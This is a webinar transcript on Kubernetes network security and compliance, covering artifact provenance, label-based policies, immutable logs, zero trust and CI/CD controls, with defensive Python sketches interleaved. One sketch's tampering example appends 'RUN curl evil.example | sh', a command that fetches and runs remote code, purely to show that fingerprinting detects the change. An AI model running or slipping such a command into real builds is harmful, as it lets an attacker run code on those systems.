While a microservice architecture, orchestrated by Kubernetes, offers a tremendous business advantage for time to market, proper security and compliance controls must be put in place.
This is a crucial step when deploying microservices and teams must work together by using the proper tools during implementation. We will explore 5 things you can do to meet security and compliance requirements for your microservices stack.
Watch this webinar to learn about considerations for security and compliance with microservices, understanding key principles for compliance, and leveraging the proper security tools and methods for compliance.
Michael: Hello everyone, and welcome to today’s webinar, Top Five Best Practices for Kubernetes’ Network Security and Compliance. My name is Michael, I’ll be your host. I’m sitting in for Erica today. I am pleased to announce today’s speaker, Christopher Liljenstolpe, he is the original architect behind Tigera’s Project Calico. He speaks at over 60 meetups yearly, educating on networking and network security for modern applications of microservices. He also consults with Tigera’s enterprise clients on security and compliance for their modern applications.
Michael: So, before I hand the microphone over to Christopher, I have a few housekeeping items that I’d like to cover about this presentation and webinar platform that you’re on. First, today’s webinar will be available on demand immediately after the live session, and will be accessible through the same link that you are using now and on the Tigera BrightTALK channel. We’ve also added some attachments and links which are available in the ‘attachments’ tab on your screen. There, you can find a copy of today’s deck and some other related links. And also, if you have questions, we’d love to hear from you. You can ask those questions by going to the ‘questions’ tab on the right and asking them. We will get to those questions at the end of the presentation. And if we don’t get to your question, we will make sure to do our best to answer it in follow-up afterwards.
Michael: So, without any further ado, I’d like to hand the mic over to Christopher and to our presentation today.
Christopher: Thank you, Michael. So, welcome everyone. What I’m gonna be talking about today is some of the approaches that you should be thinking about for securing your Kubernetes environment and maintaining compliance in your Kubernetes environments. So, I’m gonna talk about five best practices. What we’re really gonna be talking about is what you need to be thinking about in these areas. And I’ll give you some examples of what we’ve seen other customers do, what types of technologies you might wanna look at for doing these things, but I’m not gonna be prescriptive in this. And I welcome questions, we can dive into any of these if there’s interest.
Christopher: So, first let’s talk about why this is different. And I’ve talked about this a lot before, but why do we need to talk about this now, in a Kubernetes, or containerized, world? Why can’t we use exactly the same mechanics that we’ve used before? And really, the thing is that application development and deployment has fundamentally changed, or is in the process of going through a fundamental change. And it’s happening much faster, I think, than most people realize. And we’re taking applications, first of all, and we’re decomposing them into microservices. Instead of rewriting the same code 20 different times in 20 different applications in your stack, you decompose things into services so that you have a microservice that does one thing, and it can be consumed by other microservices, and you start sticking those together like Lego blocks to build your applications. That is a pattern that’s being actively pursued today, and part of the reason for doing that is it makes your application development deployment much more agile, faster response to changing market requirements or customer requirements, et cetera.
Christopher: So, the move to microservices, where before we had monolithic applications, is one driver. In order to have those microservices be consumable wherever you want to deploy them, we’re wrapping those in containers. Docker containers, Rocket, there are other container mechanisms out there, but we’re containerizing these microservices, and those become the deployment artifacts. We’ll talk about deployment artifacts in a bit. As you do this, you really want to have these environments be automatic: to respond automatically to failing workloads, to increases or decreases in demand, et cetera. So, if you want to have a responsive environment, you need to have automatic orchestration. And that’s where things like Kubernetes, et cetera, come in, where you basically explain to Kubernetes how you want your application to behave and how it’s made up, how it’s composed, what microservices are involved, et cetera.
Christopher: And Kubernetes, or one of the other orchestration platforms out there (Kubernetes seems to be the dominant one today), will then deploy those applications and manage the life cycle of your application stacks for you. And it will do that very fast; it will make decisions in time cycles of milliseconds. And it will manage a potentially very large fleet of microservices, of containers. Hundreds of thousands of containers across thousands of servers is sort of the scope of where some people are already. And you want to be able to deploy these things wherever it makes sense. So, let’s say you start off with a private data center and then you decide you want to extend into public cloud for whatever reasons. Cost control or agility: it takes time to build a data center, and there are already data centers in existence from various providers like Amazon, Azure, Google, et cetera, so you want to deploy there.
Christopher: Or maybe you wanna deploy into an area where you don’t have organic footprint. Let’s say you’re a US-based SaaS provider and you wanna test the waters in Europe or in Asia. Instead of building a data center there, you might wanna try deploying in a public cloud first and see if that will work. Similarly, acquisitions, M&A functions, or the opposite of acquisition, you get spun off: you need to have flexibility because the thing you’re acquiring, for example, might be running in Azure and you’re running in AWS. So, you need to be able to point these workloads where they make sense, and you need to make sure your artifacts and your policies and everything else are portable across all those environments, rather than having to rework everything because you moved from, say, AWS to Azure or Google. So, that’s how some things are changing in this space.
Christopher: We go to the next slide. So, we have this new environment; however, it does bring with it some consequences. Any change brings consequences. So first, from a security standpoint, perimeter security is no longer adequate. We have to assume that part of my network or infrastructure is compromised. There are two types of organizations in this world: those that know they have an advanced persistent threat internal to their organization, and those that don’t. So, we have to assume there’s compromise. Part of that can be just because we’re deploying so many different artifacts, so many different microservices today that have variable problems, such as where the developer got the base code from, et cetera. You might have imported code that might have a problem. You might’ve gotten spear-phished and some developer doesn’t even know that he’s inserting bad code somewhere. So, we have to assume that there’s compromise in the infrastructure.
Christopher: You also can no longer use security policies that are hard coded based on locations, a zone based environment. You’re in this VLAN, you’re on this IP address, this application is on this IP address. Because in a Kubernetes environment, or a Kubernetes-like environment, those things change. There aren’t things like separate VLANs, there aren’t things like static IPs. You can do that, but you sort of break the model. And what do you do if Kubernetes decides it needs to autoscale your given microservice from five nodes to a hundred nodes? It’s gotta get those addresses from somewhere, so having security tied to hard coded location-based assets is really no longer appropriate.
Christopher: Secondly, or thirdly, constant need to reconfigure firewalls. Most folks today, if you do a firewall change, I’m gonna say, average we see is a couple of weeks for someone to get a firewall change, rule change, put in. I’ve seen some folks that go up to four months. Some folks take it down to days. None of those is the five or ten-minute timeframe with which a developer can push a new version of the application to meet a blue-green test or something along those lines. So, if I need to update a firewall and it takes two weeks, then it doesn’t matter if my developer can use Kubernetes and Docker to deploy a new version of the application in five minutes if it’s gonna take two weeks to get the firewall updated to allow that to function. So, we’re sort of missing the boat and the benefit of doing this kind of approach if we’re still stuck with legacy, static firewall rules.
Christopher: Similarly, the next vein, Visibility and Traceability, in this kind of environment, most of the traffic now that used to be internal to a monolithic application [inaudible 00:09:17] is now traveling across the network, doing something we call east-west traffic. These are microservices making calls to other microservices. So, we now have most of the traffic in your network is going to be intra-application, but inter-microservice traffic, or east-west traffic. And visibility mechanisms, et cetera, that we have that were primarily focused on ingress and egress out of a cluster aren’t really fit for purpose when we’re talking about flows, potentially, between hundreds of thousands of endpoints.
Christopher: Similarly, because the artifacts that those visibility systems used, like IP addresses, are now dynamic, you might end up with a log that says IP address A talked to IP address B three months ago, and the auditors might be interested in that conversation. But you have no idea what that thing was three months ago, ’cause that IP address might’ve been reused multiple times in the same day. So, that log is pretty much useless. It’s like, an IP address talked to another IP address on a port, but I don’t know what the source was and I don’t know what the destination was. So, there’s a visibility problem there.
Christopher: You also need to aggregate the data. There’s a lot more data, there’s a much richer set of signals coming out, but you do need to aggregate it to get it into your SIEM. And it’s gotta be correlated. Again, go back to IP addresses: if the SIEM is keying off of IP addresses for that aggregation, that’s not gonna work, ’cause that same IP address could be used by multiple different microservices in any given day, or even any given hour. And this all comes back to workload identity. I need to know what the actual workload was, not where it was in the network at any given point in time.
Christopher: Lastly, Controls and Compliance. Security teams, in this environment, are unable to provide the complete and accurate data needed to ensure compliance and to prove, through a compliance audit, that you’ve been compliant. Again, this comes back to visibility and traceability. Most of the compliance tools and reports have been built around the fact that these applications were static, the VMs were static. They lived for months or years, or the servers did, et cetera, and that’s no longer the case.
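To make the IP-reuse problem concrete, here is a minimal Python sketch, not something shown in the webinar. It assumes a hypothetical allocation history (`ALLOCATIONS`) recording which workload held an address from which time; the workload names and timestamps are invented for illustration. The point is only that an IP address plus a timestamp can be resolved to a workload identity if that history is kept, and is meaningless if it is not.

```python
from bisect import bisect_right
from typing import Dict, List, Optional, Tuple

# Hypothetical allocation history: for each IP, (start_time_seconds, workload),
# sorted by start time. In a real cluster this would come from the orchestrator.
ALLOCATIONS: Dict[str, List[Tuple[int, str]]] = {
    "10.0.0.7": [(0, "checkout-v1"), (3600, "batch-report"), (7200, "checkout-v2")],
}


def workload_at(ip: str, timestamp: int) -> Optional[str]:
    """Return the workload that held `ip` at `timestamp`, or None if unknown."""
    history = ALLOCATIONS.get(ip, [])
    starts = [start for start, _ in history]
    # Index of the last allocation that began at or before the timestamp.
    index = bisect_right(starts, timestamp) - 1
    return history[index][1] if index >= 0 else None


# The same address maps to three different workloads within a few hours.
for moment in (100, 4000, 9000):
    print(moment, workload_at("10.0.0.7", moment))
```

A log line that stores the workload identity directly avoids this lookup altogether, which is the direction the talk argues for.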
Christopher: The last thing, and probably the most important thing about this change, is today, most organizations are very siloed. The network teams, the security teams, the platform teams, the application development teams are all very siloed, and the way they interact with each other is in a waterfall model. They pass tickets back and forth to request services, request changes. That doesn’t work in this kind of model where you’re trying to be agile and develop things. So, you need to start having security tools that allow these groups to all collaborate in an agile fashion rather than relying on trouble tickets and email to make your changes. So, that’s some of the things that change in this environment and some of the things you need to be thinking about if you move to this kind of environment.
Christopher: So, I sort of identified five things that you really should be thinking about as you go onto this journey. So, why don’t we start with the first? Now, I’m gonna talk about Controls and Compliance.
Christopher: The first thing we probably should do is make sure that you’re deploying what you think you should be deploying. So, you will probably want to use artifact analysis, static and/or runtime analysis, to increase confidence that the workload that you’re deploying, the microservice or the Docker container, is not compromised or vulnerable. It doesn’t already have 20 CVEs on it. So, that’s one thing. Is this thing that I’m going to deploy trustworthy? There are a number of repositories for containers that you can use. Some of them come with platforms like OpenShift. Others you can use publicly, like Docker Hub or Quay, and those can do container scanning for you, so you know that at least the thing you’re deploying doesn’t have any known CVEs, or at least no major CVEs. Or, even if it has a major CVE, you can look at it and say, “That’s not something that’s exposed in this container, so it’s not a critical thing for me to cover,” but at least you go into this with your eyes open. So, let’s take a look at those workloads.
Christopher: Second, you need to maintain a provenance … sorry, within this one, go back. Michael’s a little fast on the button, there. Maintain a provenance that is verifiable and traceable on your artifacts. So, once you’ve written that code and you’ve checked that code and you know it does what you want it to do, you want to make sure that it is always the same, that somebody can’t come in later and make a change to that code and not have you know about it. Because what’s going to happen when Kubernetes decides it needs to spin up 10 more of these things is that it’s just gonna go back to the same repo and pull that image again. So unless you know that it hasn’t been mucked with or screwed with, you don’t really know if you’re deploying the same thing.
Christopher: So, you want to use source code control systems like Git, or something along those lines. You wanna maybe do fingerprinting on those workloads. Once you’ve decided through your CI/CD pipeline, et cetera, that this workload is the thing you want to deploy, that this version of the container is what you wanna deploy, you want to make sure that’s what you always deploy. So, let’s make use of those source code control systems and those CI/CD chains, fingerprinting and other things, to make sure that you’re deploying what you think you’re deploying. And in order to do that, let’s make sure that these are repeatable, again, using a source code control system and a CI/CD chain. Instead of having people just use, say, kubectl to deploy a pod when they need to, maybe that should go through a CI/CD chain such that when somebody commits the code, it goes into the CI environment, and then CD deploys it. And that way, everything is traceable back through that source code control and CI/CD system and it’s all appropriately logged, et cetera.
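The fingerprinting idea can be sketched in a few lines of Python. This is an illustrative sketch under stated assumptions, not the speaker's tooling: the artifact bytes are a stand-in for a container image, and `fingerprint` and `is_approved` are hypothetical helper names. It uses only the standard library (`hashlib.sha256`, `hmac.compare_digest`) to show that a digest recorded at approval time lets you detect any later change to the artifact.

```python
import hashlib
import hmac


def fingerprint(artifact: bytes) -> str:
    """Return a SHA-256 fingerprint in the 'sha256:<hex>' form used for image digests."""
    return "sha256:" + hashlib.sha256(artifact).hexdigest()


def is_approved(artifact: bytes, approved_digest: str) -> bool:
    """True only if the artifact matches the digest recorded when it was approved."""
    return hmac.compare_digest(fingerprint(artifact), approved_digest)


# Hypothetical artifact bytes standing in for a built container image.
approved = b"FROM scratch\nCOPY app /app\n"
recorded = fingerprint(approved)  # stored by the pipeline at approval time

# Someone changes the artifact after approval.
tampered = approved + b"RUN curl evil.example | sh\n"

print(is_approved(approved, recorded))  # True
print(is_approved(tampered, recorded))  # False
```

Deploying by recorded digest rather than by a mutable tag is one way to apply the same check every time the orchestrator pulls the image again.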
Christopher: If we go on to best practice two, now we need to make sure that all our deployments are in compliance. Because things like IP addresses are ephemeral, we need to use other things to identify the workloads. That could be fingerprints, that could be metadata labels on the workload: “This thing is a PCI-contaminated database. This thing is a PCI-compliant querier of that database. This thing is a microservice in application Bob. It is in stage prod; it’s been approved for use in production versus dev or test.”
Christopher: So all those metadata labels are actively used by other things in Kubernetes. Your developers are attaching these labels. If you can use these labels as an identity rather than an IP address, you’re way far ahead, because the labels now describe what the thing is. Same with fingerprints, et cetera. So you can then start attaching compliance regimes via labels. This workload is required to be in the PCI compliance regime or the GDPR compliance regime, or ISO, or FedRAMP, or whatever ones you have. So use this metadata to identify the compliance regimes, the functions, the state, et cetera.
Christopher: That is a much more useful and, if you think about it, multifactor way of identifying a workload than just an IP address. Second, you need to make sure that your compliance policies are themselves controlled and automatically applied. So instead of making a decision, case by case, about whether you need to apply this policy to this workload, you should be saying, “Here’s the label that identifies a state or a function of this application.” This database is contaminated with PCI data, credit card data. That might be the label, PCI contaminated. Then you can write policies that say, “I don’t care if it’s a database, if it’s an application, if it’s an S3 bucket.”
Christopher: If it’s labeled that it’s PCI contaminated, then the PCI set of policies must be applied to it, or the GDPR policies must be applied to it if it’s PII-contaminated data and the location is in Europe, or anywhere else, frankly, with the way the rules are written. But the policies are attracted to the state and the workload automatically, especially if you’re using something like Kubernetes Network Policy and a Tigera solution that implements that, rather than you having to make a decision on a case-by-case basis or, worse yet, having your developers make that decision about whether something needs to be secured or not. Then you need to make sure that, for the policies that do things like enforce compliance and keep you out of a congressional testimony room, only people who are appropriately qualified can make changes to those policies, i.e., the developer can’t change what the PCI control policy is, only the compliance team can, et cetera. So you need to make sure that the policies can only be changed, created, or deleted by the appropriate people, and that the policies are automatically attracted.
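The way labels "attract" policies can be illustrated with a small Python sketch. This is a simplified model, not Kubernetes or Tigera code: the policy names, label keys, and the `POLICY_SELECTORS` catalogue are all hypothetical, and the matching rule is plain equality on every key in the selector, which is the simplest form of a label selector.

```python
from typing import Dict, List

Labels = Dict[str, str]

# Hypothetical policy catalogue: each policy names the labels that attract it.
POLICY_SELECTORS: Dict[str, Labels] = {
    "pci-controls": {"pci-contaminated": "true"},
    "gdpr-controls": {"pii-contaminated": "true"},
    "prod-baseline": {"stage": "prod"},
}


def matches(selector: Labels, labels: Labels) -> bool:
    """A selector matches when every key/value it names is present on the workload."""
    return all(labels.get(key) == value for key, value in selector.items())


def policies_for(labels: Labels) -> List[str]:
    """Return the names of all policies attracted by a workload's labels."""
    return sorted(name for name, selector in POLICY_SELECTORS.items()
                  if matches(selector, labels))


database = {"app": "bob", "stage": "prod", "pci-contaminated": "true"}
print(policies_for(database))  # ['pci-controls', 'prod-baseline']
```

Nobody decides per workload which policies apply; the decision follows from the labels, so the remaining control is who may assert the labels and who may edit the catalogue.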
Christopher: So that’s the next thing you need to do to ensure that your deployments are in compliance. We go to the next slide: we need to make sure that logs are meaningful and durable. So we’re talking about potentially thousands of servers. We have customers who are using Tigera’s solution with tens of thousands of servers. So you’ve got lots of endpoints all reporting, and some of those servers might be hosting hundreds of workloads each. So you’ve got to keep all of this correlated, so that all of the signal coming in to the logging platform, to your SIEM, et cetera, is correlated and you can actually detect what’s really happening in the platform. So all these events, both administrative and operational, must be logged. By administrative, I’m talking more about audit logs: who deployed that container, who watched that deployment, who edited that policy, et cetera. And operational: this policy blocked traffic to this PCI workload because the other end was not PCI compliant.
Christopher: So those are operational logs versus the first, which are administrative. All of these things must be date-time correlated. You need to make sure everything has the same concept of time so that you don’t have things firing off logs that look like they’re minutes apart when really they happened at the same time, or that look like they happened at the same time when they really didn’t. Your logs need to be immutable. If somebody can go in and change your logs, your logs aren’t really all that useful, so you need to make sure that you have some form of immutability control: write-only access for the system, controlled so that other people cannot change them, or fingerprinting of the logs. There are multiple ways you can do this, but you do need to make sure they’re immutable.
Christopher: Those logs need to reference a long-lived identity, and preferably a multiple-factor identity. What were the labels? What’s the Kubernetes namespace this was deployed in? What was the actual name of the pod, which is derived from the actual deployment name? What was the service account, i.e., the X.509 certificate that was attached to this? So you need to start looking at multiple forms of identity to be able to say, with surety, that this workload was exactly of this type that generated this logging event. The other thing that’s really useful is to refer to the policies or controls involved in the event. So let’s say the traffic was blocked or allowed to this PCI-contaminated database. Not only do I want to know that it was allowed or denied and who actually made that access, what the other end was, but it’d be really nice to know what policy allowed it or denied it so I can see if my policy controls were correct.
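One of the "multiple ways" to get tamper evidence is to fingerprint each log entry together with its predecessor, so that editing any earlier entry breaks every later fingerprint. The Python sketch below is an assumption-laden illustration of that hash-chaining technique, not a description of any product's log format; the event fields and actor names are invented. Note that this detects modification rather than preventing it, so it complements access controls instead of replacing them.

```python
import hashlib
import json
from typing import Dict, List

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _entry_hash(prev_hash: str, event: Dict[str, str]) -> str:
    """Fingerprint an event together with the hash of the entry before it."""
    payload = json.dumps(event, sort_keys=True).encode("utf-8")
    return hashlib.sha256(prev_hash.encode("ascii") + payload).hexdigest()


def append(log: List[dict], event: Dict[str, str]) -> None:
    """Append an event, chaining it to the current tail of the log."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    log.append({"event": event, "prev": prev_hash,
                "hash": _entry_hash(prev_hash, event)})


def verify(log: List[dict]) -> bool:
    """Recompute the chain; any edited, removed, or reordered entry fails."""
    prev_hash = GENESIS
    for entry in log:
        expected = _entry_hash(prev_hash, entry["event"])
        if entry["prev"] != prev_hash or entry["hash"] != expected:
            return False
        prev_hash = entry["hash"]
    return True


audit_log: List[dict] = []
append(audit_log, {"time": "2019-01-01T00:00:00Z", "actor": "alice", "action": "edit-policy"})
append(audit_log, {"time": "2019-01-01T00:00:05Z", "actor": "bob", "action": "deploy"})
print(verify(audit_log))  # True

audit_log[0]["event"]["actor"] = "mallory"  # rewrite history
print(verify(audit_log))  # False
```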
Christopher: It might’ve gotten blocked, but if I go back later and say, it was blocked by some other policy, not the PCI control policy that it should have been blocked by, now I know I have a policy problem. The flow is still blocked, so we’re still okay, but we’re okay by accident, not by purpose. So having the actual policies that were involved allow you to then say, go back to your auditors and say at any point in time, at 4:58, three months ago on a Friday afternoon, the PCI policy was working exactly as expected, or it wasn’t and we found out why and we fixed the problem. The other thing you need to do is have alerting and diagnostics based on time series data streams. There’s a lot of signal going on here. You probably do not want to have your alerting system triggered for each and every dropped packet, or you will never get any sleep and it will eventually just become background noise and no one will respond to it, so you’re really interested in alerting and logging and reporting on data based on time series.
Christopher: Did a cluster of events happen right next to each other or over a long period of time? What was the rate of events for this policy? Below this level it’s just standard door knocking and I don’t care, versus, “Oh, that’s a really interesting thing.” If all of a sudden I went to 10 times greater violations on my PCI compliance policies than I had before, then we might be having an event going on. It’s really useful then to say, “Oh, and it’s this version of this workload that did that, and I traced that back,” going back to my earlier comments, and see that it was based on this version that just got pushed, and we pulled a new version of something out of Docker Hub or Quay, and it turns out that maybe that thing isn’t quite jake, isn’t quite good.
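Rate-based alerting of this kind can be sketched with a sliding window over event timestamps. The Python below is a minimal illustration under assumptions: the function name `spike_times`, the 60-second window, the baseline of two denials per window, and the sample data are all hypothetical. The 10x factor mirrors the "10 times greater violations" figure in the talk. It alerts only when the number of events in the trailing window reaches the factor times the normal rate, so routine background denials stay quiet.

```python
from collections import deque
from typing import Deque, Iterable, List


def spike_times(event_times: Iterable[float], window: float,
                baseline_per_window: float, factor: float = 10.0) -> List[float]:
    """Return the timestamps at which the trailing-window event count
    reaches `factor` times the baseline. `event_times` must be ascending."""
    recent: Deque[float] = deque()
    alerts: List[float] = []
    for t in event_times:
        recent.append(t)
        # Drop events that have fallen out of the trailing window (t - window, t].
        while recent and recent[0] <= t - window:
            recent.popleft()
        if len(recent) >= factor * baseline_per_window:
            alerts.append(t)
    return alerts


# Hypothetical data: one policy denial every 30 seconds ("door knocking"),
# followed by a burst of 20 denials within 10 seconds.
background = [30.0 * i for i in range(10)]
burst = [300.0 + 0.5 * i for i in range(20)]

print(spike_times(background, window=60.0, baseline_per_window=2.0))
print(spike_times(background + burst, window=60.0, baseline_per_window=2.0))
```

The first call reports nothing; the second reports only the tail of the burst, once the window count has climbed to the threshold.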
Christopher: So that tells you immediately where your problem is. If we go to the fourth item, we need to embrace zero trust network security. This is going to sound like a broken record because everyone talks about zero trust security, but what we mean by this is we have to assume that you have one or more compromises in your network. I used to be a US park ranger, and one of the things we got in our officer survival training was: once you find a weapon on a subject, don’t stop searching, because people who have one weapon probably have more than one weapon. So just because you find a compromise in your infrastructure, don’t assume you found all the compromises in the infrastructure. Always assume there’s compromise, always assume there are multiple compromises. There are multiple compromises.
Christopher: Having the assumption that a single control point can provide security is a pretty bad idea because that might be the thing that’s compromised. So that all leads to another point, which is multiple control points. You wanna make sure that your policies, the controls that you’re putting into your system, are enforced at multiple points in the infrastructure, say in the pod, outside of the pod on the same host, in the infrastructure, et cetera, so that you’re providing multiple control points such that a compromise of any one of them does not compromise your security posture. Multifactor identity: you want to make your decisions based not just on a single thing, but on multiple factors. What’s the behavior of the application? Is this pod behaving like we expect it to? Is it trying to talk to the things that we expect it to talk to? What are the identities that the orchestrator has assigned to it, cryptographic identities based on service accounts or something like that?
Christopher: So you want to make these decisions about what to enforce on what based on multiple factors of identity. So again, if there’s a single compromise, you’re still probably safe. And you want to do these controls at multiple layers of the stack, because there’s different data at different points in the stack. So I could write a policy that Bob can talk to Alice on port 443. That’s great. That’s at the network layer. I could make it stronger by saying Bob can talk to Alice on 443, but can only make an HTTP GET for customer records; the URI is prefaced by customer record. Now I’ve got a layer five through seven behavior attached to this as well. Lastly, I can say Bob can only talk to Alice on 443, can only do HTTP GETs on URIs prefaced by customer record, and requires a certificate, i.e., a service account, that belongs to this group of service accounts.
Christopher: So I now have controls at the TLS layer, at the application layer, i.e., that HTTP query, and at the network layer, and now all of those things have to line up in order for that traffic to flow. If any one of those things doesn’t match, the traffic is blocked and I get an alert. So, having controls at multiple points, at multiple layers of the infrastructure, based on multiple identities, I now have a reasonable assurance against compromise unless the compromise happens to be on the wire and I’ve got a man in the middle. I’ve decided to allow the traffic, but then there’s a man in the middle. We’ve talked about cryptographic controls in this kind of environment. It is best to encrypt the traffic in flight, and you want that to be automated. You don’t want to have to be managing two things.
Christopher: You don’t want to be managing the keys yourself. You want the system to do that because, again, these pods are coming and going all the time. You want a certificate assigned to each individual workload because you don’t want to [inaudible 00:27:38] compromise to take out 100 or 200 or 1,000 or 10,000 workloads. Lastly, you probably don’t want your developers to be doing all the TLS work themselves. Developers screw up crypto. Not only that, if you had all of your developers build the crypto into your apps, and then Heartbleed 2 comes along, you have to figure out all the applications, all the microservices that use TLS, which would be all of them, and go fix all of them with the new library. Compare that with having a service that embeds in the pod, like Istio and its Envoy proxy, to actually offload that TLS within the pod but outside of the application, so you now have one place to fix it if there’s a cryptographic problem.
Christopher: And that’s the key thing here. Most people either embed crypto in the application, which means you have to touch all the applications when Heartbleed happens again, and it will, or you have some big middle box somewhere, or do it on the host. Say we do it at the host layer. You’ve got 100 containers. That means hundreds of containers on that host all have to share their keys with that one endpoint. That becomes a juicier target. There are 100 keys to compromise if I get on that host. If I do it at a middle-box TLS gateway, maybe I have tens of thousands of keys that have to sit on there. It’s created a wonderful man-in-the-middle point for an attacker to go after and get all your keys to the kingdom, literally. If you do this where it is something that slides into the pod, but it’s not part of the application itself, it only has one key.
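The Bob-and-Alice example can be written down as a policy check in which the network layer, the application layer, and the workload identity all have to line up. The Python below is only a sketch of that logic: the `Request` fields, the `/customer-record` prefix, and the service account name `bob-frontend` are hypothetical stand-ins, and a real enforcement point would evaluate these conditions in the data path rather than in a single function.

```python
from dataclasses import dataclass
from typing import FrozenSet


@dataclass(frozen=True)
class Request:
    source_app: str       # workload identity of the caller (from labels)
    dest_app: str         # workload identity of the callee
    port: int             # network layer
    method: str           # application layer: HTTP method
    path: str             # application layer: request URI
    service_account: str  # identity carried in the caller's certificate


# Hypothetical group of service accounts allowed to read customer records.
ALLOWED_ACCOUNTS: FrozenSet[str] = frozenset({"bob-frontend"})


def allowed(req: Request) -> bool:
    """Allow traffic only when every layer agrees; any mismatch blocks it."""
    network_ok = (req.source_app == "bob" and req.dest_app == "alice"
                  and req.port == 443)
    application_ok = (req.method == "GET"
                      and req.path.startswith("/customer-record"))
    identity_ok = req.service_account in ALLOWED_ACCOUNTS
    return network_ok and application_ok and identity_ok


good = Request("bob", "alice", 443, "GET", "/customer-record/42", "bob-frontend")
wrong_verb = Request("bob", "alice", 443, "DELETE", "/customer-record/42", "bob-frontend")
wrong_cert = Request("bob", "alice", 443, "GET", "/customer-record/42", "unknown")

print(allowed(good))        # True
print(allowed(wrong_verb))  # False
print(allowed(wrong_cert))  # False
```

An attacker who defeats one factor, for example by reaching port 443 from the right address, still fails the other two checks.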
Christopher: It only has the key for that instance of that microservice. The compromise is limited, the blast radius is limited. So look at doing something like Istio and Envoy to do your TLS security rather than doing this as a middle-box approach, at the host level, or higher up the stack. Lastly, orchestrate your security just like you orchestrate your code. Security should not be something that you deal with on an entirely separate pane of glass. You might have a pane of glass that gives you security-type information, but you want to make sure that your security system can be integrated into the CI/CD pipeline, the source code control, et cetera, so that at any point in time you can roll back to a known good security standpoint. If somebody writes security rules and they touch a sensitive area, make sure that those are RBAC controlled. Only the compliance folks can write rules that are about compliance.
Christopher: Make sure that changes that people make potentially have code review, [inaudible 00:30:17] policy review, or a policy enforcement review. All those things that you already do for your code deployment, you should be doing for security. Once you put the security artifacts into your control system and you’re using CI/CD to deploy them, then the orchestrator needs to deliver these. The orchestrator is orchestrating everything else in the system. Using a security enforcement mechanism, policy enforcement mechanism, or compliance mechanism that is not driven by the orchestrator is frankly barking mad. I tend not to be so vocal sometimes, but your orchestrator is orchestrating everything else. It’s orchestrating your storage, it’s orchestrating your connectivity between your microservices. It’s doing all of those things.
Christopher: If your security is separate from that, then you will inherently have a disconnect, an impedance mismatch, between your security platform and everything else. So anything you’re doing should be driven via the orchestration, either taking inputs from the orchestration or events from the orchestrator so it can respond, but you want the orchestrator and your platform to be very closely linked. If they’re not, you’re going to open up holes, seams, and they will be exploited. So make sure that your compliance and security platform are integrated with the orchestration. The orchestration system can drive it just like it’s driving everything else. Your controls, your security artifacts need to be workload centric. You shouldn’t be thinking about this VLAN can talk to that VLAN. VLANs are ephemeral; they might not even exist.
Christopher: IP addresses, et cetera: I sound like a broken record here, but the security needs to be tied to the artifacts that the orchestrator and other things surface. It needs to be enforced as close to that workload as possible. It needs to be tied to the workload, not to a secondary thing like the IP address of a workload, and not done in a middle-box firewall somewhere. The security enforcement needs to be very closely coupled to that workload, so wherever the workload goes, the policy follows, the policy enforcement follows. I think with that, those are what I call five best practices. There are probably a few more, well, there are definitely a few more that are out there, but five was a good starting point. I’d love to hear what your thoughts are or what questions you have at this point. Michael, I turn it back over to you.
Michael: Thank you. Once again, if you have questions, you can go ahead and put them into the input on the right that says ‘questions’. We do have some questions. A couple of questions are around when you mentioned CI/CD systems. Can you talk a little bit more about security when integrating a CI/CD system into Kubernetes?
Christopher: Sure. There are two factors to that. One is the security of the link between the CI/CD system and Kubernetes. Two is what you might want to do, from a security control standpoint, with things going through a CI/CD system. First of all, most of the damage you can do in Kubernetes is controlled by RBAC. If you’re doing CI/CD, say CD specifically, to push deployments or services et cetera into Kubernetes, you need to make sure that the CI/CD system has the appropriate RBAC controls, is using TLS, and is using client-side certs to authenticate as well. You want to make sure that the CD system is appropriately scoped. You might even want to think about having different CD runners based on what you’re deploying. You might have a different CD runner, for example, for things that deploy compliance policies, versus developer policies, versus DevOps just deploying an application. Those might be different CD runners with different RBAC controls on them, different RBAC principals on them, to make sure that somebody can’t subvert one of those CD runners to do something that they shouldn’t be able to do. That’s one.
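As a rough illustration of scoping CD runners separately, here is a minimal Python sketch. The runner names (`compliance-cd`, `app-cd`) and the permission table are hypothetical and only model the idea in memory; in a real cluster this scoping would be expressed as Kubernetes RBAC roles bound to each runner's identity.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Runner:
    """A CD runner and the (verb, resource) pairs it may act on (hypothetical model)."""
    name: str
    allowed: frozenset


# Hypothetical runners: one for compliance policies, one for application deploys.
RUNNERS = {
    "compliance-cd": Runner(
        "compliance-cd",
        frozenset({("create", "networkpolicies"), ("update", "networkpolicies")}),
    ),
    "app-cd": Runner(
        "app-cd",
        frozenset({
            ("create", "deployments"),
            ("update", "deployments"),
            ("create", "services"),
        }),
    ),
}


def is_allowed(runner_name: str, verb: str, resource: str) -> bool:
    """Least privilege: deny unless the runner is known and explicitly granted the action."""
    runner = RUNNERS.get(runner_name)
    return runner is not None and (verb, resource) in runner.allowed
```

With this split, a subverted application runner still cannot touch policy objects, because `is_allowed("app-cd", "update", "networkpolicies")` is false.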
Christopher: If we look at the other side of that equation, what controls can you put in CI/CD to make sure that you’re maintaining security in your platform? Things that are security relevant, like label assertion, can be done in CI/CD. You can basically say in your CD system: if anyone tries to assert a label of PCI compliant = true, and that person is not in the right group in Git (which again should be tied back to RBAC) that says they’re part of the compliance team, then instead of just running, that CI/CD pipeline gets pulled out for a code review, for lack of a better word. Just like any other code review, it goes to someone on the compliance team to decide whether that workload should be labeled PCI compliant = true or not. So there’s using CI/CD to enforce controls on what goes through the CI/CD pipeline, as well as controls on the CI/CD pipeline itself to enforce, again, least privilege. Make sure the runners et cetera have only the privileges necessary to do the things that you’re asking them to do, which means having different runners for the different types of tasks that you might run through your CI/CD pipeline.
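The label-assertion gate described here could be sketched roughly as follows. This is an illustration only: the label key `pci-compliant`, the group name `compliance-team`, and the function name are assumptions, and a real pipeline would read labels from the manifest under review and group membership from the Git host.

```python
# Hypothetical mapping: (label key, label value) -> group allowed to assert it.
SENSITIVE_LABELS = {
    ("pci-compliant", "true"): "compliance-team",
}


def required_reviews(labels: dict, author_groups: set) -> list:
    """Return the groups that must review before the pipeline may run.

    An empty list means the author is entitled to assert every sensitive
    label in the change, so the pipeline can proceed without extra review.
    """
    needed = set()
    for key, value in labels.items():
        group = SENSITIVE_LABELS.get((key, value))
        if group is not None and group not in author_groups:
            needed.add(group)
    return sorted(needed)
```

For example, a developer outside the compliance team who sets `pci-compliant: "true"` gets `["compliance-team"]` back, and the change is held for that team's review instead of being deployed.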
